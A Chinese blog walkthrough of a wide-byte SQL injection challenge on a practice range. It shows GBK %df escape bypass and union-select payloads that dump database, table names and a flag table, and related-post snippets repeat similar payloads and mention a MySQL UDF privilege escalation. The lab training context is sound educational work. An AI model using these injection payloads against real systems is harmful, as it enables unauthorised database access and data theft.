安鸾平台宽字节注入

已于 2022-03-18 19:48:21 修改
阅读量3.9k 收藏
点赞数 1
分类专栏: 安鸾渗透实战 宽字节注入 文章标签: 网络安全
于 2022-03-18 19:41:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48925532/article/details/123582733
版权

1.题目URL:http://47.103.94.191:8011
2.首先尝试加’,发现被转义为.
但是当数据库编码为GBK时,可以使用宽字节注入,先在地址后面加%df,因为反斜杠的编码为%5c,gbk中%df%5c是繁体字
所以说在1和’中间添加%df

在这里插入图片描述
加入后发现 合理
在这里插入图片描述
3.尝试爆破
爆数据库:?id=-1%df’ union select 1,database(),3,4,5 --+ 可发现数据库为kzf
爆表:
id=-1%df’ union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=‘kzf’
此时发现数据库中‘’也被转义了
这里采用小葵工具将kzf转为16进制内容
0x6B7A66
在这里插入图片描述
4.?id=-1%df’ union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x6B7A66–+
在这里插入图片描述
5.最后爆数据内容
?id=-1%df’ union select * from kzf.this_flag

凉了呢_
关注
专栏目录
sqlmap跑宽字节注入(渗透测试之SQL注入宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 897
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
web渗透--33--宽字节注入
武天旭的博客
09-16 1003
1、漏洞描述: 宽字节注入是相对于单字节注入而言的,该注入跟HTML页面编码无关,宽字节注入常见于mysql中,GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节。字节带来的安全问题主要是吃ASCII字符(一字节)的现象,当%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了%df...
安鸾渗透实战平台|字符注入
m_de_g的博客
12-17 2895
安鸾渗透实战平台|字符注入 一、渗透靶场地址 http://www.whalwl.work:8011 二、渗透实战 1.先使用1'进行测试,发现被斜杆转义 2.根据题目提示,直接上手宽字节注入,可以成功 ?id=1%df'--+ 3.测试or,and,==是否被过滤 ?id=1%df' or 1=1--+ 4.判断列 ?id=1%df' order by 1,2,3,4,5,6--+ 5.发现有5列,判断注入点 ?id=0%df' union select 1,2,3,4,5--+ 6.
SQL宽字节注入01
海宝最美的博客
12-20 287
靶机地址:http://www.whalwl.top:8011【2020年8月前有效】 1、http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=1 %23 //不报错 http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=2%23 //报错 代码执行,说明存在注入 2、i...
Right 注入语法-转mysql注入时当字符太长显示不全的-安鸾靶场 字符注入02
zyf007love的博客
09-12 260
Right 注入语法
安鸾靶场 字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3365
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
安鸾渗透实战平台-sql注入
weixin_48421613的博客
01-04 3389
sql注入安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
宽字节注入
weixin_53026460的博客
11-07 1678
但是编码不同就会产生歧义,比如说编码a和编码b,组合在一起的时候可能形成某一个汉字,如果编码a、b、c三个字符在一起,去编码的时候,用不同的编码去看待它是不一样的东西;举个例子,有句话叫:下雨天留人天留我不留,我们可以通过断句的不同来决定这句话的涵义;编码也是一样的,也有标点符号的问题,比如说原本是普通的英文编码,假设a、b、c、d这是四个单独的字符,但是呢现在这个英文编码传过去之后用中文去解,这个时候它可能会被解码出其他的东西。所以说不同的编码会造成不同的状态;
宽字节注入详解-附件资源
03-05
宽字节注入详解-附件资源
13 宽字节注入1
08-03
宽字节注入攻击 宽字节注入攻击是一种常见的数据库安全漏洞,攻击者可以通过 inject恶意数据库查询语句来获得敏感信息或控制数据库。这种攻击方式通常发生在使用GBK编码的数据库中,攻击者可以使用宽字节注入来 ...
安鸾渗透实战平台|SQL数字型注入详细教程
qq_67262179的博客
05-06 1733
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录@[TOC](文章目录) 安鸾渗透实战平台|SQL数字型注入详细教程前言一、Mysql默认的information库基本1.schemata表内容2.tables表内容3.columns表内容二、渗透靶场地址三、mysql渗透步骤1.进入靶场,查看页面基本信息2.判断是否存在注入3.判断是否存在 符号过滤4.判断数据库字段列名数量5.使用联合查询判断显位点6.基本信息收集7.查询指定数据(cms)库下所有的表名8.查询指定表明下的.
Webservice之应用协议SOAP
心火燃烧!
11-08 598
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
linux mysql udf 提权
ddr12231的博客
05-09 689
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
gbk字符编码和字节sql注入
sworddancing is the best one
09-27 2571
ctf题目中宽字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6878
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8461
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
_Command_line_settings_desktop_wallpaper_tool,_Su_command-wallpa
最新发布
09-17
_Command_line_settings_desktop_wallpaper_tool,_Su_command-wallpaper
IMG_20240917_151703.jpg
09-17
IMG_20240917_151703.jpg
sql注入宽字节注入
07-28
SQL注入宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值